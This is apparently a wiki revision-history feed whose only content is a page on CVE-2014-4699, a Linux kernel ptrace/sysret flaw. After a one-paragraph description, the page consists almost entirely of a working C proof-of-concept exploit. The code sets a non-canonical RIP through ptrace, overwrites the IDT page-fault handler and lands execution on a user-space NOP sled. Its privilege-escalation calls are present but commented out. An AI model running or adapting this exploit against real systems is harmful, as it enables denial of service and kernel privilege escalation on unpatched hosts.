https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2014-4699_Linux_kernel_before_3.15.4%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9ECVE-2014-4699 Linux kernel before 3.15.4拒絕服務漏洞 - Revision history2026-04-20T09:06:14ZRevision history for this page on the wikiMediaWiki 1.35.1https://pwnwiki.com/index.php?title=CVE-2014-4699_Linux_kernel_before_3.15.4%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E&diff=1099&oldid=prevPwnwiki: Created page with "==INFO== The Linux kernel before 3.15.4 on Intel processors does not properly restrict use of a non-canonical value for the saved RIP address in the case of a system call that..."2021-04-07T08:03:29Z<p>Created page with "==INFO== The Linux kernel before 3.15.4 on Intel processors does not properly restrict use of a non-canonical value for the saved RIP address in the case of a system call that..."</p>
<p><b>New page</b></p><div>==INFO==<br />
The Linux kernel before 3.15.4 on Intel processors does not properly restrict use of a non-canonical value for the saved RIP address in the case of a system call that does not use IRET, which allows local users to leverage a race condition and gain privileges, or cause a denial of service (double fault), via a crafted application that makes ptrace and fork system calls.<br />
<br />
==POC==<br />
<pre><br />
/**<br />
* CVE-2014-4699 ptrace/sysret PoC<br />
* by Vitaly Nikolenko<br />
* vnik5287@gmail.com<br />
*<br />
* > gcc -O2 poc_v0.c<br />
*<br />
* This code is kernel specific. On Ubuntu 12.04.0 LTS (3.2.0-23-generic), the<br />
* following will trigger the #GP in sysret and overwrite the #PF handler so we<br />
* can land to our NOP sled mapped at 0x80000000.<br />
* However, once landed, the IDT will be trashed. We can either attempt to<br />
* restore it (then escalate privileges and execute our shellcode) or find<br />
* something else to overwrite that would transfer exec flow to our controlled<br />
* user-space address. Since 3.10.something, IDT is read-only anyway. If you<br />
* have any ideas, let me know.<br />
*/<br />
<br />
#include <stdio.h><br />
#include <stdint.h><br />
#include <assert.h><br />
#include <sys/ptrace.h><br />
#include <sys/types.h><br />
#include <sys/wait.h><br />
#include <sys/syscall.h><br />
#include <sys/user.h><br />
#include <unistd.h><br />
#include <sys/mman.h><br />
#include <errno.h><br />
<br />
#define SIZE 0x10000000<br />
<br />
typedef int __attribute__((regparm(3))) (*commit_creds_fn)(unsigned long cred);<br />
typedef unsigned long __attribute__((regparm(3))) (*prepare_kernel_cred_fn)(unsigned long cred);<br />
<br />
unsigned long __user_cs;<br />
unsigned long __user_ss;<br />
unsigned long __user_rflags;<br />
<br />
void __attribute__((regparm(3))) payload() {<br />
uint32_t *fixptr = (void*)0xffffffff81dd70e8;<br />
// restore the #PF handler<br />
*fixptr = -1;<br />
//commit_creds_fn commit_creds = (commit_creds_fn)0xffffffff81091630;<br />
//prepare_kernel_cred_fn prepare_kernel_cred = (prepare_kernel_cred_fn)0xffffffff810918e0;<br />
//commit_creds(prepare_kernel_cred((uint64_t)NULL));<br />
<br />
//__asm__ volatile ("swapgs\n\t"<br />
// "...");<br />
}<br />
<br />
int main() {<br />
struct user_regs_struct regs;<br />
uint8_t *trampoline, *tmp;<br />
int status;<br />
<br />
struct {<br />
uint16_t limit;<br />
uint64_t addr;<br />
} __attribute__((packed)) idt;<br />
<br />
// MAP_POPULATE so we don't trigger extra #PF<br />
trampoline = mmap(0x80000000, SIZE, 7|PROT_EXEC|PROT_READ|PROT_WRITE, 0x32|MAP_FIXED|MAP_POPULATE|MAP_GROWSDOWN, 0,0);<br />
assert(trampoline == 0x80000000);<br />
memset(trampoline, 0x90, SIZE); <br />
tmp = trampoline;<br />
tmp += SIZE-1024;<br />
memcpy(tmp, &payload, 1024);<br />
memcpy(tmp-13,"\x0f\x01\xf8\xe8\5\0\0\0\x0f\x01\xf8\x48\xcf", 13);<br />
<br />
pid_t chld;<br />
<br />
if ((chld = fork()) < 0) {<br />
perror("fork");<br />
exit(1);<br />
}<br />
<br />
if (chld == 0) { <br />
if (ptrace(PTRACE_TRACEME, 0, 0, 0) != 0) {<br />
perror("PTRACE_TRACEME");<br />
exit(1);<br />
}<br />
raise(SIGSTOP);<br />
fork();<br />
return 0;<br />
}<br />
<br />
asm volatile("sidt %0" : "=m" (idt));<br />
printf("IDT addr = 0x%lx\n", idt.addr);<br />
<br />
waitpid(chld, &status, 0);<br />
<br />
ptrace(PTRACE_SETOPTIONS, chld, 0, PTRACE_O_TRACEFORK); <br />
<br />
ptrace(PTRACE_CONT, chld, 0, 0);<br />
<br />
waitpid(chld, &status, 0); <br />
<br />
ptrace(PTRACE_GETREGS, chld, NULL, &regs);<br />
regs.rdi = 0x0000000000000000;<br />
regs.rip = 0x8fffffffffffffff;<br />
regs.rsp = idt.addr + 14*16 + 8 + 0xb0 - 0x78;<br />
<br />
// attempt to restore the IDT<br />
regs.rdi = 0x0000000000000000;<br />
regs.rsi = 0x81658e000010cbd0;<br />
regs.rdx = 0x00000000ffffffff;<br />
regs.rcx = 0x81658e000010cba0;<br />
regs.rax = 0x00000000ffffffff;<br />
regs.r8 = 0x81658e010010cb00;<br />
regs.r9 = 0x00000000ffffffff;<br />
regs.r10 = 0x81668e0000106b10;<br />
regs.r11 = 0x00000000ffffffff;<br />
regs.rbx = 0x81668e0000106ac0;<br />
regs.rbp = 0x00000000ffffffff;<br />
regs.r12 = 0x81668e0000106ac0;<br />
regs.r13 = 0x00000000ffffffff;<br />
regs.r14 = 0x81668e0200106a90;<br />
regs.r15 = 0x00000000ffffffff;<br />
<br />
ptrace(PTRACE_SETREGS, chld, NULL, &regs);<br />
<br />
ptrace(PTRACE_CONT, chld, 0, 0);<br />
<br />
ptrace(PTRACE_DETACH, chld, 0, 0);<br />
}<br />
<br />
</pre></div>Pwnwiki